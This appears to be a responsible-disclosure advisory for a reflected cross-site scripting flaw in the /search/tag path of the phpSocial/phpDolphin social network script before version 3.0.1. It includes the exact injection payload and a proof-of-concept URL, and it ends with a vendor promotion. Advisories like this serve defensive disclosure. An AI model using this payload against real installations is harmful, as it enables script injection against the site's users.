[-] Product Description:
phpSocial is a Social Network Platform similar with Facebook, allowing users to interact with each other by live chatting, sending messages, comments, like, share photos, life events and so much more.
[-] Vulnerability Type:
Reflected Cross Site Scripting
[-] Impact and more info:
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
[-] Version affected:
phpSocial / phpDolphin < (3.0.1)
[-] Vulnerable Request Type:
GET
[-] Vulnerable Module/Parameter/Path:
/search/tag
[-] Payload used:
“><img src=”x” onerror=”alert(document.domain)”>
[-] Proof of Concept URL:
InstallationDomain/search/tag/”><img src=”x” onerror=”alert(document.domain)”>
[-] Proof of concept Video:
https://youtu.be/h_SKQWOdUXw
[-] Fix Suggestion:
Filter and sanitize all the user supplied inputs.
[-] Product Changelog:
3.0.1 – 2 July 2017
Improved support for PHP 7.1+
Improved character encoding support
Fixed permalinks for combined search filters
Fixed a security fix regression
Other minor improvements
[-] Product URL(s):
https://phpsocial.com/page/changelog
https://codecanyon.net/item/phpdolphin-social-network-platform/5158794
[-] Product Changelog:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-10801
[-] Disclaimer:
This bug is subject to Seekurity SAS de C.V. responsible disclosure rules which is a 90-day-disclosure-deadline. After 90 days elapse or a patch has been made broadly available, the bug details will become visible to the public through our official communication channels.
A minute if you please!
Building a website, an application or any kind of business? Or already have one? Worried about your security? Think twice before going public and let us protect your business!
Previous Next